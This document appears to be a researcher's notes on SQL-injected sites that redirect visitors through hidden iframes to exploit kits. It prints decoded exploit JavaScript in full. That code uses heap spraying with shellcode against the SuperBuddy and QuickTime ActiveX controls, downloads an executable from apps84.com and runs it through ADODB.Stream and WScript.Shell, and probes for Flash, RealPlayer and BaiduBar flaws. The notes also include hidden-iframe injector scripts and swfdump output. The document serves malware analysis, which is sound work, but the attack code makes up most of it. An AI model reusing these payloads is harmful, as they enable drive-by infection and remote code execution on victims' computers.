This injected JS contains iframe from 456.htm and dj.htm as well as dvb.bnmfg.com.cn/bnmfg/aa.htm?11
456.htm loads malicious swf files.
dj.htm loads exploits from www.heiheinn.cn
The iframe dvb.bnmfg.com.cn/bnmfg/aa.htm?11 downloads a bunch of other exploits targeting realplayer, flashplayer and others
This sql injected URL will call hidden iframe from http://bios47.com/cgi-bin/index.cgi?ad
bios47.com uses obfuscated scripts same as those in apps84.com
This new injected domain will call hidden iframe from http://apps84.com/cgi-bin/index.cgi?ad
index.cgi?ad is an obfuscated JS, which successfully decoded will depending on the browser version and language setting, download code from http://apps84.com/cgi-bin/index.cgi?ffd34c3e0100f0600077e0ed58060000000002b7b2ae43ff[code]
Interestingly, the code downloaded is another obfuscated javascript. Using the same method of decoding, results in this code
function q37Qot3M(C9a5yGFZ)
{
var qPjQyRih = "abcdefghiklmnopqrstuvwxyz0123456789";
var Z4mYjfqe = '';
for (var ayDbH97x=0; ayDbH97x<C9a5yGFZ; ayDbH97x++) {
var UxA8KpPP = Math.floor(Math.random() * qPjQyRih.length);
Z4mYjfqe += qPjQyRih.substring(UxA8KpPP, UxA8KpPP+1);
}
return Z4mYjfqe;
}
function rRr2voNt(gqzRhsXa, zDW_Nrnc)
{
var UqeZTIIs = null;
var ewf9BHSL = 'UqeZTIIs=gqzRhsXa.';
var pb4SCZne = new Array(
'CreateObject(zDW_Nrnc)',
'CreateObject(zDW_Nrnc, "")',
'CreateObject(zDW_Nrnc, "", "")',
'GetObject("", zDW_Nrnc)',
'GetObject(zDW_Nrnc, "")',
'GetObject(zDW_Nrnc)'
);
var ibygzrSi=0;
while(!UqeZTIIs && ibygzrSi < pb4SCZne.length) {
try {
eval(ewf9BHSL+pb4SCZne[ibygzrSi]);
} catch(e) { }
ibygzrSi++;
}
return UqeZTIIs;
}
function EQnpdJ3R(rDx3Y3YK, nmg1Ya8Z)
{
try {
rDx3Y3YK.open("GET", nmg1Ya8Z, false);
rDx3Y3YK.send(null);
} catch(e) { return 0; }
return rDx3Y3YK.responseBody;
}
function iFzeRt3v(kJVv5iSV, GGib1Bbs, nlpYQQkD)
{
try {
kJVv5iSV.Type = 1;
kJVv5iSV.Mode = 3;
kJVv5iSV.Open();
kJVv5iSV.Write(nlpYQQkD);
kJVv5iSV.SaveToFile(GGib1Bbs, 2);
kJVv5iSV.Close();
} catch(e) { return 0; }
return 1;
}
function l8NTJVdS(fjt4aEGK, rDx3Y3YK, kJVv5iSV, f8ooKsQo, GFWQLQNh)
{
var ybDUybhC = 0;
var HgFYBJZD = EQnpdJ3R(rDx3Y3YK, fjt4aEGK);
if (HgFYBJZD != 0) {
var lJ99WYEL = "c:\\"+q37Qot3M(6)+".exe";
if (iFzeRt3v(kJVv5iSV, lJ99WYEL, HgFYBJZD) == 1) {
if (GFWQLQNh == 0) {
try {
f8ooKsQo.Run(lJ99WYEL, 0);
ybDUybhC = 1;
} catch(e) { }
} else {
try {
f8ooKsQo.ShellExecute(lJ99WYEL, "", "", "open", 0);
ybDUybhC = 1;
} catch(e) { }
}
}
}
return ybDUybhC;
}
function GpU6LOfo()
{
var rEoXWlfi = 0;
var bc_CUBHX = 1;
var VGCo6zkO = "http://apps84.com/cgi-bin/index.cgi?ff4a457c0100f0600277e0ed58060000000002b72ba2710001040900000000020";
var kf4nCFPY = new Array(null, null, null);
try {
var nAn0J9zC = 0;
var rv9jQ4yP = document.createElement("object");
rv9jQ4yP.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
if (rv9jQ4yP) {
kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "msxml2.XMLHTTP");
if (!kf4nCFPY[0])
kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "Microsoft.XMLHTTP");
if (!kf4nCFPY[0])
kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "MSXML2.ServerXMLHTTP");
kf4nCFPY[1] = rRr2voNt(rv9jQ4yP, "ADODB.Stream");
kf4nCFPY[2] = rRr2voNt(rv9jQ4yP, "WScript.Shell");
if (!kf4nCFPY[2]) {
kf4nCFPY[2] = rRr2voNt(rv9jQ4yP, "Shell.Application");
if (kf4nCFPY[2]) nAn0J9zC = 1;
}
}
if (kf4nCFPY[0] && kf4nCFPY[1] && kf4nCFPY[2]) {
for(var ELxcGHTj=0;ELxcGHTj<bc_CUBHX;ELxcGHTj++) {
var GH3tzsho = l8NTJVdS(VGCo6zkO+ELxcGHTj.toString(), kf4nCFPY[0], kf4nCFPY[1], kf4nCFPY[2], nAn0J9zC);
if (!rEoXWlfi)
rEoXWlfi = GH3tzsho;
}
}
} catch(e) {}
return rEoXWlfi;
}
function z15QLzDF(NpTt78SK, vyRa5Vhw)
{
try {
var bcUSP1AU = new Date();
bcUSP1AU.setDate(bcUSP1AU.getDate() + 120000);
if (NpTt78SK) {
document.cookie =
"id=" + NpTt78SK +
"; path=/" +
"; expires=" + bcUSP1AU.toGMTString();
}
if (vyRa5Vhw) {
document.cookie =
"addt=" + vyRa5Vhw +
"; path=/" +
"; expires=" + bcUSP1AU.toGMTString();
}
} catch(e) {
}
}
var lajutPnm = new Array();
var xnyWSACx = 0;
function t02H59nf()
{
lajutPnm = lajutPnm;
setTimeout(t02H59nf, 100);
}
function wuWdTHTE(qXNjDqmd, aDNIjIpy)
{
while (qXNjDqmd.length*2<aDNIjIpy)
qXNjDqmd += qXNjDqmd;
qXNjDqmd = qXNjDqmd.substring(0,aDNIjIpy/2);
return qXNjDqmd;
}
function S3czSfbD()
{
if (!xnyWSACx) {
var V2dJq4HP = 0x0c0c0c0c;
var qsNDyV7P = unescape("%u00e8%u0000%u5d00%uc583%ub914%u018d%u0000%ue4b0%u4530%u4500%u7549%uebf9%u7400%u7474%u7474%u7474%u0d74%ue418%ue4e4%u80bb%ud445%ue4e4%u9ce4%u6fe8%ue8a4%u946f%u49f8%u8c6f%u0fec%u6fed%ud0a4%ua469%u6f98%ud88c%u136f%ue08e%u0cbd%ue46b%ue4e4%u1d06%u8b8c%ue48a%u8ce4%u9691%u8988%u1bb0%u6ff2%u0c0c%ue49d%ue4e4%u336f%u64a3%ue4db%u1e91%ub3a3%u64a3%ue4db%u1e91%u0b6f%ud7bb%u652d%ue008%ue4e5%u6fe4%ub538%ub7b6%ue08c%ue4e5%u1be4%ue8b2%ubdbe%ub6b5%ue66f%ua7b7%udf64%u91e4%u651e%u189f%u81ca%u819c%ue791%u0f67%u6dec%u23e7%ue0a7%u81ca%u819c%ua722%ue4ec%u6ebf%ue025%u6cd4%ue4a1%u24d7%ub4b4%ub3b7%u1bb4%uf4b2%u1c67%u91e4%u8ee2%ub7e5%ub21b%ubee0%u67bd%ue026%u64a5%ue4de%u5091%ub21b%ub5ec%u6fb2%ud891%u906f%u9cca%u11e7%u6fb2%uc492%u11e7%u2dd7%ua5ad%ue749%ud721%ueb3f%uf45a%u32de%uec90%u2f25%ue7e9%ua43e%u150f%ufbdf%u0391%u6fba%uc0ba%u39e7%u6f82%uafe8%uba6f%ue7f8%u6f39%u6fe0%u21e7%uba4f%u27bd%u1b0c%u1b1a%u6a1b%ueaaa%u7c08%u6e1a%u9aea%u063c%ud797%u6e2e%ud2bf%ucbfe%u9494%u8c83%ue4a3%u908c%u9490%ucbde%u85cb%u9494%udc97%ucad0%u8b87%ucb89%u8387%uc98d%u8d86%ucb8a%u8a8d%u8180%uca9c%u8387%udb8d%u8282%u85d0%ud1d0%u87d3%ud5d4%ud4d4%ud482%ud4d2%ud6d4%ud3d3%ud481%u8081%udcd1%ud2d4%ud4d4%ud4d4%ud4d4%ud4d4%ud6d4%ud386%u86d6%ud685%ud5d3%ud4d4%ud5d4%ud0d4%uddd4%ud4d4%ud4d4%ud4d4%ud4d4%udcd4%ue4d4");
var yuVqerxP = 0x400000;
var FDatJxfq = qsNDyV7P.length * 2;
var aDNIjIpy = yuVqerxP - (FDatJxfq+0x38);
var qXNjDqmd = unescape("%u0c0c%u0c0c");
qXNjDqmd = wuWdTHTE(qXNjDqmd,aDNIjIpy);
var NGNogBza = (V2dJq4HP - 0x400000)/yuVqerxP;
for (var U4Dn_RUx=0;U4Dn_RUx<NGNogBza;U4Dn_RUx++) {
lajutPnm[U4Dn_RUx] = qXNjDqmd + qsNDyV7P;
}
xnyWSACx = 1;
t02H59nf();
}
return 0;
}
function JgIeEAxw() {
try {
var YNu_L1Ip = new ActiveXObject('Sb.SuperBuddy');
if (YNu_L1Ip) {
S3czSfbD();
z15QLzDF(9);
YNu_L1Ip.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}
return 0;
}
function zmpCkFBI()
{
try {
var plv4KWFi = new ActiveXObject("QuickTime.QuickTime.4");
if (plv4KWFi) {
S3czSfbD();
var mk84Pufq = "";
for(var Zxae7BbE=0;Zxae7BbE<200;Zxae7BbE++) {
mk84Pufq += "AAAA";
}
mk84Pufq += "AAA";
for(var Zxae7BbE=0;Zxae7BbE<3;Zxae7BbE++) {
mk84Pufq += "\x0c\x0c\x0c\x0c";
}
var Et27CeXt =
'' +
'' +
'' +
'' +
'<param name="qtnext1" value="T">' +
'' +
'';
gAqc_6tX = 0;
var eBUg1ask = document.createElement("div");
eBUg1ask.innerHTML = Et27CeXt;
z15QLzDF(6);
document.body.appendChild(eBUg1ask);
}
} catch(e) {
}
return 0;
}
if (GpU6LOfo() || JgIeEAxw() || zmpCkFBI()
) {
document.XQYxMigz = 'about:blank';
} else {
document.XQYxMigz = 'about:blank';
}
/*setTimeout(function() {
if (document.gAqc_6tX && document.mEWDIx_N && document.Z4lSVtbt) {
setTimeout("window.location = '" + document.XQYxMigz + "';", 1000);
} else {
setTimeout(arguments.callee, 1000);
}
}, 1000);*/
A new SQL injected JS.
It will call iframes from www.kiiss117.cn/456.htm and www.kiiss117.cn/dj.htm
dj.htm exploits vulnerabilities by calling iframes from www.heiheinn.cn/14.htm , real.htm and new.htm
Content of this JS
window.status = "完毕";
document.write("<iframe src=http://c.liuliang000.com/wending09.htm width=2 height=2></iframe>");
Content of wending09.htm
<iframe src=main.htm width=10 height=0></iframe> <script language="javascript" type="text/javascript" src="http://js.users.51.la/1937043.js"></script>
The decoded JS content for main.htm is
try{var e;var ado=(document.createElement("object"));if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{if(e!="[object Error]"){var a="%dfdf%%D$F^D%SF&DS";document.write("<script src=014.js><\/script>")}else{try{var f;var Flashver=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",")}catch(f){};finally{if(f!="[object Error]"&&Flashver[2]!="124"&&Flashver[2]!="60"){document.write('<embed src="http://swf.4w4w4w.com/swf/'+Flashver[2]+'.swf"></embed>')}}try{var g;var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31")}catch(g){};finally{if(g!="[object Error]"){document.write('<iframe style=display:none src="lz.htm"></iframe>')}}try{var h;var real=new ActiveXObject("IERPCtl.IERPCtl.1")}catch(h){};finally{if(h!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552"){document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=rl.js><\/script>')}}}try{var i;var Baidu=new ActiveXObject("BaiduBar.Tool")}catch(i){};finally{if(i!="[object Error]"){Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://xia.9w9w9w.com/down/abd.cab","abd.exe",0)}}}}
As can be seen some of the exploits are downloaded from
The content of this JS is similar to the others, basically calling exploits using iframes to
The content of this script calls 2 iframe:
www.qiqicc.cn/dj.htm calls the following iframe
www.killpp.cn/456.htm embeds these 2 flash: 4561.swf and 4562.swf
The swf files downloads 2 other swf files (based on flash player version): WIN%209,0,115,0i.swf and WIN%209,0,115,0f.swf
this injected domain iframes to http://err68.com/cgi-bin/index.cgi?ad
www.encode72.com/b.js
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://err68.com/cgi-bin/index.cgi?ad width=0 height
=0 frameborder=0></iframe>");
window.open("http://topsoftwaresale.com",'soft',"toolbar=no,location=no,director
ies=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1015,height=600,top
=10,left=10");
}
catch(e)
{
};
}
As can be seen from the content it opens a website topsoftwaresale.com. but embedded is an iframe from err68.com/cgi-bin/index.cgi?ad
The content of the iframe how to decode it can be seen here.
Similar to the injected domain above, the others are as follows:
www.tag58.com/b.js -> encode72.com/cgi-bin/index.cgi?ad
www.win496.com/b.js -> exec51.com/cgi-bin/index.cgi?ad
www.exe94.com/b.js -> err68.com/cgi-bin/index.cgi?ad
www.view89.com/b.js -> err68.com/cgi-bin/index.cgi?ad
www.rundll841.com/b.js -> win496.com/cgi-bin/index.cgi?ad
err68.com/b.js -> win496.com/cgi-bin/index.cgi?ad
exec51.com/b.js -> err68.com/cgi-bin/index.cgi?ad
content of a.js essentially iframes to 456.htm
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("0wen0wen=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 1 * 60 * 60 * 1000);
document.cookie = "0wen0wen=funny;expires=" + expires.toGMTString();
try{
document.write("<iframe width=10 height=10 src=http://o7n9.cn/456.htm></iframe>");
}
catch(e)
{
};
content of 456.htm retrieves 2 SWF files 4561.swf and 4562.swf
swfdump -D 4561.swf
[HEADER] File version: 8
[HEADER] File is zlib compressed. Ratio: 96%
[HEADER] File size: 164 (Depacked)
[HEADER] Frame rate: 12.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 550.00
[HEADER] Movie height: 400.00
[045] 4 FILEATTRIBUTES
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018] 31 PROTECT
[00c] 89 DOACTION
( 50 bytes) action: Constantpool(5 entries) String:"fVersion" String:"/:$version" String:"http://o7n9.cn/" String:"i.swf" String:"_root"
( 4 bytes) action: Push Lookup:0 ("fVersion") Lookup:1 ("/:$version")
( 0 bytes) action: GetVariable
( 0 bytes) action: DefineLocal
( 4 bytes) action: Push Lookup:2 ("http://o7n9.cn/") Lookup:0 ("fVersion")
( 0 bytes) action: GetVariable
( 0 bytes) action: Add2
( 2 bytes) action: Push Lookup:3 ("i.swf")
( 0 bytes) action: Add2
( 2 bytes) action: Push Lookup:4 ("_root")
( 0 bytes) action: GetVariable
( 1 bytes) action: GetUrl2 64
( 0 bytes) action: Stop
( 0 bytes) action: End
[001] 0 SHOWFRAME 1 (00:00:00,000)
[000] 0 END
So the 2 SWF files retrieves flash exploits by using the player version as part of the filename.
